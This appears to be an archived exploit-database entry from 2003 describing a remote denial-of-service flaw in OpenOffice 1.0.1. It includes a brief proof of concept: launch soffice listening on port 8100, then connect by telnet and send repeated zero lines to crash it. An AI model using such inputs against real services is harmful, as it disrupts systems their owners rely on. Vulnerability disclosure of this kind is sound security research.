OpenOffice 1.0.1 - Remote Access Denial of Service

Author: Marc Schoenefeld
type: dos
platform: windows
port: 
date_added: 2003-10-08  
date_updated: 2012-12-09  
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 23235.txt  
source: https://www.securityfocus.com/bid/8794/info

OpenOffice provides functionality so that it can be configured to listen on a designated network port for incoming communications.

OpenOffice is prone to a remote denial of service vulnerability under certain circumstances. The issue presents itself when an attacker connects to a remote OpenOffice session and transmits malicious data to the affected software. The software will apparently fail when handling the malicious data.

C:\Programme\oo1.1.0\program> soffice "-accept=socket,host=<ip>,port=8100;urp;"

===================================================================
C:\Dokumente und Einstellungen\User>telnet 127.0.0.1 8100
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
0
0
0
0
0
0
0
0
0
0
0
0